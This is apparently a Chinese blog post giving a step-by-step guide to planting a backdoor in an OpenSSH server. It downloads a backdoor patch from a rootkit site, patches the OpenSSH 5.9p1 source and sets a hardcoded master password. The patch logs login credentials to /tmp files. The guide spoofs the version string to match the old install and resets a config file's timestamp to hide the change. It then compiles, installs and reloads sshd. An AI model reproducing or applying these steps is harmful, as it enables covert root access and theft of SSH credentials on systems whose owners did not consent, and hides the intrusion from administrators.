http://redkey.blog.51cto.com/335290/1345091
一.查看SSH版本
[root@redkey vmshare]
# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
二.下载SSH 源码包
源码包:
http:
//openbsd
.org.ar
/pub/OpenBSD/OpenSSH/portable/openssh-5
.9p1.
tar
.gz
后门文件:
http:
//core
.ipsecs.com
/rootkit/patch-to-hack/0x06-openssh-5
.9p1.patch.
tar
.gz
三.备份原有ssh配置文件
[root@redkey ~]
# cp -p /etc/ssh/sshd_config{,.bak}
四.编译安装
[root@redkey vmshare]
# tar -xzvf openssh-5.9p1.tar.gz
[root@redkey vmshare]
# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
[root@redkey vmshare]
# cd openssh-5.9p1.patch/
[root@redkey openssh-5.9p1.patch]
# cp sshbd5.9p1.diff ../openssh-5.9p1
[root@redkey openssh-5.9p1.patch]
# cd ../openssh-5.9p1
[root@redkey openssh-5.9p1]
# patch < sshbd5.9p1.diff
patching
file
auth.c
patching
file
auth-pam.c
patching
file
auth-
passwd
.c
patching
file
canohost.c
patching
file
includes.h
patching
file
log.c
patching
file
servconf.c
patching
file
sshconnect2.c
patching
file
sshlogin.c
patching
file
version.hxiu
设置后门密码"redkey"
[root@redkey openssh-5.9p1]
# vim includes.h
175 int secret_ok;
176 FILE *f;
177
#define ILOG "/tmp/ilog"
178
#define OLOG "/tmp/olog"
179
#define SECRETPW "redkey"
180
#endif /* INCLUDES_H */
修改版本信息(SSH_VERSION):
/* $OpenBSD: version.h,
v
1.62 2011
/08/02
23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
编译&安装
[root@redkey openssh-5.9p1]
# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
[root@redkey openssh-5.9p1]
# make
[root@redkey openssh-5.9p1]
# make install
|
五.还原sshd_config文件时间戳
[root@redkey
ssh
]
# touch -r sshd_config.bak ssh_config
六.重启服务或重新载入配置
[root@redkey
ssh
]
# service sshd reload
七.常见问题
1.需要安装的软件包
openssl openssl-devel pam-devel
2.编译常见的问题
编译过程中可能出现的报错:
configure: error: *** zlib.h missing – please
install
first or check config.log
#
#yum install zlib-devel
configure: error: *** Can't
find
recent OpenSSL libcrypto (see config.log
for
details) ***
#
#yum install openssl openssl-devel